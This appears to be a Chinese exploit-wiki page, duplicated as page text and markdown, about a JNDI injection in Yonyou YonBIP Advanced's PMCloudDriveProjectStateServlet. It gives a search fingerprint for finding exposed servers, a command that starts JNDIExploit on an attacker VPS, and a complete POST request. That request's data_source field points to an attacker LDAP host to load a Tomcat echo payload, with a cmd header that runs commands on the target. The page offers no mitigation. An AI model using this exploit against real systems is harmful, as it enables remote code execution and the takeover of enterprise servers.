fofamini-wiki

登录白背景

源码

用友YonBIP高级版PMCloudDriveProjectStateServlet存在JNID注入漏洞

一、漏洞简介

YonBIP用友商业创新平台，是用友在数字经济时代面向成长型、大型企业及巨型企业，融合了先进且高可用技术平台和公共与关键商业应用与服务，支撑和运行客户的商业创新（业务创新、管理变革），并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版PMCloudDriveProjectStateServlet存在JNID注入漏洞，攻击者可通过该漏洞获取服务器权限。

二、影响版本

用友YonBIP高级版

三、资产测绘

hunterweb.body="/nccloud/resources/uap/rbac/login/main/index.html"
特征

四、漏洞复现

将JNDIExploit-1.4-SNAPSHOT.jar上传到VPS

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSIP

JNDIExploit-1.4-SNAPSHOT.jar

POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1
Host: 
cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Connection: close

{
    "data_source":"ldap://vpsip:1389/TomcatBypass/TomcatEcho",
    "user":""
}

原文: https://www.yuque.com/xiaokp7/ocvun2/hdhkzvdo2qsrdqsm

# 用友YonBIP高级版PMCloudDriveProjectStateServlet存在JNID注入漏洞

# 一、漏洞简介
YonBIP用友商业创新平台，是用友在数字经济时代面向成长型、大型企业及巨型企业，融合了先进且高可用技术平台和公共与关键商业应用与服务，支撑和运行客户的商业创新（业务创新、管理变革），并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版PMCloudDriveProjectStateServlet存在JNID注入漏洞，攻击者可通过该漏洞获取服务器权限。

# 二、影响版本
+ 用友YonBIP高级版

# 三、资产测绘
+ hunter`web.body="/nccloud/resources/uap/rbac/login/main/index.html"`
+ 特征

![1699617335151-ab45cdc1-ba2a-4518-8a9d-5aa6a95e7263.png](./img/RyCB7ibV747Wu5tc/1699617335151-ab45cdc1-ba2a-4518-8a9d-5aa6a95e7263-164438.png)

# 四、漏洞复现
将`JNDIExploit-1.4-SNAPSHOT.jar`上传到VPS

```plain
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSIP
```

[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2025/jar/29512878/1755717966139-c8bded02-bae5-4ac5-bb36-e5cc43a65e62.jar)

![1702470660563-8242e318-75b7-4793-8af4-c1b8655efbef.png](./img/RyCB7ibV747Wu5tc/1702470660563-8242e318-75b7-4793-8af4-c1b8655efbef-101611.png)

```plain
POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1
Host: 
cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Connection: close

{
    "data_source":"ldap://vpsip:1389/TomcatBypass/TomcatEcho",
    "user":""
}
```

![1706580714415-7740a65a-6bfe-401a-bf1c-4ebd09ab483b.png](./img/RyCB7ibV747Wu5tc/1706580714415-7740a65a-6bfe-401a-bf1c-4ebd09ab483b-630834.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hdhkzvdo2qsrdqsm>